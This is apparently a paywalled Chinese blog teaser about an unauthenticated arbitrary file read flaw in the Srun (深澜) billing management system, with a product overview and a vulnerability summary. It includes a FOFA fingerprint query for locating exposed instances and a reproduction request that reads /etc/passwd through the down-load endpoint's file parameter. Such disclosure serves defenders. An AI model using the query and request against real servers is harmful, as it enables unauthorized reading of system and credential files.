超级会员免费看
本文详细介绍了深澜计费管理系统中存在的任意文件读取漏洞,该漏洞可能导致未授权的攻击者获取服务器上的任意文件。文章涵盖了漏洞概述、影响范围,并通过步骤复现了漏洞,旨在帮助读者理解和防范此类安全风险。
0x01 产品简介
深澜计费管理系统是一套完善的、领先的具有复杂生物型特征的弹性认证计费系统。其主要由以下几个模块组成:AAA认证计费平台、系统运营维护管理平台、用户及策略管理平台、用户自助服务平台、智能客户端模块、消息推送模块以及数据统计模块。该系统为全球超过2500家客户提供服务,其中包括中国Top100高校中的60%选用本产品。
0x02 漏洞概述
深澜计费管理系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件。
0x03 测绘语句
fofa:icon_hash="-1546320596"0x04 漏洞复现
GET /user/group/down-load?file=/etc/passwd HTTP/1.1
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
